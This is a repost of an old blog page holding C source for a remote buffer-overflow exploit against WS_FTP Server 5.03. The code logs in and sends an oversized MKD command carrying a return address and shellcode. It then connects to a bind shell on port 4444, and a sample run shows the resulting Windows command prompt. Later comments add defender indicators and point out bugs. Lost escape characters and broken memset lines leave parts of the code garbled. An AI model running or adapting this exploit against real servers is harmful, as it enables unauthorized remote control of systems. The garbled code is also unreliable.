
WS_FTP Server v5.03 Remote buffer overflow Exploit

原创 网络安全 作者:coolwinds 时间:2004-12-02 14:21:15 0 删除 编辑
/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:WINNTsystem32>

Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo :)

*/
代码:
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/* TCP port of the FTP control channel that main() logs in to. */
#define PORT 21
/*
 * TCP port main() connects to on the same host once the oversized MKD
 * request has been sent. Defender note: a new listener or inbound session
 * on this port on an FTP server is a useful indicator to alert on.
 */
#define RPORT 4444
/*
 * String main() appends directly after the 519 filler bytes. The author
 * labels it as specific to one platform (Windows 2000 SP4).
 * NOTE(review): as rendered on this page the literal holds no escape
 * sequences, so it is ordinary text; it is kept verbatim.
 */
#define RET "x53x9Bx2Ex7C" /*win2k sp4*/

/*
 * Opaque payload blob that main() appends to the end of the MKD argument.
 * It is not decoded or analysed here. The sample run in the header comment
 * shows a command prompt being served on port 4444 (RPORT) afterwards.
 * NOTE(review): as rendered on this page the literal holds no escape
 * sequences, so it is ordinary ASCII text; it is reproduced verbatim.
 */
char shellcode[]=
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xb1xbe"
"x94x1dx83xebxfcxe2xf4x4dx56xc2x1dxb1xbexc7x48xe7"
"xe9x1fx71x95xa6x1fx58x8dx35xc0x18xc9xbfx7ex96xfb"
"xa6x1fx47x91xbfx7fxfex83xf7x1fx29x3axbfx7ax2cx4e"
"x42xa5xddx1dx86x74x69xb6x7fx5bx10xb0x79x7fxefx8a"
"xc2xb0x09xc4x5fx1fx47x95xbfx7fx7bx3axb2xdfx96xeb"
"xa2x95xf6x3axbax1fx1cx59x55x96x2cx71xe1xcax40xea"
"x7cx9cx1dxefxd4xa4x44xd5x35x8dx96xeaxb2x1fx46xad"
"x35x8fx96xeaxb6xc7x75x3fxf0x9axf1x4ex68x1dxdax30"
"x52x94x1cxb1xbexc3x4bxe2x37x71xf5x96xbex94x1dx21"
"xbfx94x1dx07xa7x8cxfax15xa7xe4xf4x54xf7x12x54x15"
"xa4xe4xdax15x13xbaxf4x68xb7x61xb0x7ax53x68x26xe6"
"xedxa6x42x82x8cx94x46x3cxf5xb4x4cx4ex69x1dxc2x38"
"x7dx19x68xa5xd4x93x44xe0xedx6bx29x3ex41xc1x19xe8"
"x37x90x93x53x4cxbfx3axe5x41xa3xe2xe4x8exa5xddxe1"
"xeexc4x4dxf1xeexd4x4dx4exebxb8x94x76x8fx4fx4exe2"
"xd6x96x1dxa0xe2x1dxfdxdbxaexc4x4ax4exebxb0x4exe6"
"x41xc1x35xe2xeaxc3xe2xe4x9ex1dxdaxd9xfdxd9x59xb1"
"x37x77x9ax4bx8fx54x90xcdx9ax38x77xa4xe7x67xb6x36"
"x44x17xf1xe5x78xd0x39xa1xfaxf2xdaxf5x9axa8x1cxb0"
"x37xe8x39xf9x37xe8x39xfdx37xe8x39xe1x33xd0x39xa1"
"xeaxc4x4cxe0xefxd5x4cxf8xefxc5x4exe0x41xe1x1dxd9"
"xccx6axaexa7x41xc1x19x4ex6ex1dxfbx4excbx94x75x1c"
"x67x91xd3x4exebx90x94x72xd4x6bxe2x87x41x47xe2xc4"
"xbexfcxedx3bxbaxcbxe2xe4xbaxa5xc6xe2x41x44x1d";

/* Destination address filled in by conn(); every call overwrites it. */
struct sockaddr_in hrm;

/*
 * Relay bytes between the connected socket `sock` and the local terminal:
 * whatever arrives on the socket is written to descriptor 1, and whatever
 * is read from descriptor 0 is written to the socket. The loop ends only
 * through exit() on a read result of zero or less, or by falling out to
 * close(sock) when select() fails.
 *
 * NOTE(review): fd_read is never cleared with FD_ZERO, so its initial
 * contents are indeterminate and bits set by an earlier iteration are only
 * ever added to. The results of both write() calls are ignored.
 */
void shell(int sock)
{
 fd_set  fd_read;
 char buff[1024];
 int n;

 while(1) {
  /* Watch both the remote socket and local standard input. */
  FD_SET(sock,&fd_read);
  FD_SET(0,&fd_read);

  /* Block with no timeout until one of them is readable. */
  if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;

  if( FD_ISSET(sock, &fd_read) ) {
   /* Remote side has data: a zero-length read is treated as the peer closing. */
   n=read(sock,buff,sizeof(buff));
   if (n == 0) {
       printf ("Connection closed.n");
       exit(EXIT_FAILURE);
   } else if (n < 0) {
       perror("read remote");
       exit(EXIT_FAILURE);
   }
   write(1,buff,n);
  }

  if ( FD_ISSET(0, &fd_read) ) {
    /* Local input: end of input and read errors both terminate the process. */
    if((n=read(0,buff,sizeof(buff)))<=0){
      perror ("read user");
      exit(EXIT_FAILURE);
    }
    write(sock,buff,n);
  }
 }
 /* Reached only when select() reports an error. */
 close(sock);
}

/*
 * Open a TCP connection to the IPv4 address `ip` on port `p`.
 *
 * The destination is written into the file-scope `hrm` structure, so each
 * call overwrites the address used by the previous one. On success a
 * status line is printed and the connected descriptor is returned. If
 * connect() fails the error is reported with perror() and the process
 * exits with status 0.
 *
 * NOTE(review): neither inet_addr() nor socket() is checked for failure
 * before connect() is attempted.
 */
int conn(char *ip,int p)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    int rc;

    /* Describe the peer: IPv4 family, parsed address, port in network order. */
    bzero(&(hrm.sin_zero), 8);
    hrm.sin_port = htons(p);
    hrm.sin_addr.s_addr = inet_addr(ip);
    hrm.sin_family = AF_INET;

    rc = connect(fd, (struct sockaddr *)&hrm, sizeof(struct sockaddr));
    if (rc < 0) {
        perror("connect");
        exit(0);
    }

    printf("[x] Connected to: %s on port %d.n", ip, p);
    return fd;
}

/*
 * Command-line driver. argv[1] is the server address; argv[2] and argv[3]
 * are an FTP user name and password. With fewer than three arguments it
 * prints a usage line and exits.
 *
 * Sequence visible in the body:
 *   1. Assemble a 954-byte buffer from 519 bytes of 0x41, the RET string,
 *      32 bytes of 0x42 and the `shellcode` array.
 *   2. Connect to PORT (21), send a single "USER ... PASS ..." string and
 *      sleep for two seconds.
 *   3. Send "MKD ", then 954 bytes of the buffer, then a short terminator
 *      string; sleep two seconds and close the connection.
 *   4. Connect to RPORT (4444) on the same address and pass that socket to
 *      shell().
 *
 * Points for defenders:
 *   - The oversized request is an FTP MKD command whose argument is 954
 *     bytes long, far beyond any ordinary directory name. Length limits on
 *     FTP command arguments, or an alert on MKD arguments of this size,
 *     cover the request as written.
 *   - Credentials are sent first; presumably the server only processes MKD
 *     in an authenticated session, so account hygiene narrows exposure.
 *     Server replies are never read, so this is not confirmed by the code.
 *   - The banner printed at step 4 follows any successful connect() to
 *     RPORT (conn() exits on failure); filtering inbound connections to
 *     ports the server does not publish blocks this step.
 *   - The page title names WS_FTP Server v5.03 as the affected product;
 *     the durable fix is a vendor release that bounds the MKD argument.
 *
 * NOTE(review): `user`, `pass` and `request` are 32-byte heap buffers that
 * are filled with unbounded strcpy()/sprintf() from argv, none of the
 * malloc() results is checked, and main() has no return statement. The
 * fill value of four memset() calls was lost in the page rendering; those
 * lines are reproduced verbatim.
 */
int main(int argc, char *argv[])
{
    printf("***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***n");
    /* Address, user name and password are all required. */
    if(argc<4)
    {
        fprintf(stderr,"Usage: IP USER PASSn");
        exit(0);
    }

    /* Working buffers: none of these allocations is checked or freed. */
    char *buffer=malloc(954),*A=malloc(519),*B=malloc(32),*target=argv[1],*user=malloc(32),
    *pass=malloc(32),*request=malloc(32);
    /* x: control-channel socket on PORT; y: second socket on RPORT. */
    int x,y;
    memset(request,',32);
    memset(user,',32);
    memset(pass,',32);
    memset(buffer,',954);
    memset(A,0x41,519);
    memset(B,0x42,32);
    
    strcpy(user,argv[2]);
    strcpy(pass,argv[3]);
    
    strcat(buffer,A);
    strcat(buffer,RET);
    strcat(buffer,B);
    strcat(buffer,shellcode);

    sprintf(request,"USER %srnPASS %srn",user,pass);

    x = conn(target,PORT);    
    printf("[x] Sending Login..");
    write(x,request,strlen(request));
    printf("done.n");
    sleep(2);
    
    printf("[x] Sending bad code..");
    write(x,"MKD ",4);
    write(x,buffer,954);
    write(x,"rn",2);
    printf("done.n");
    sleep(2);
    close(x);
    printf("[x] Checking if exploitation was successful..n");
    y=conn(target,RPORT);
    printf("[x] 0wn3d!nn");
    shell(y);
    close(y);    
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-782986/,如需转载,请注明出处,否则将追究法律责任。
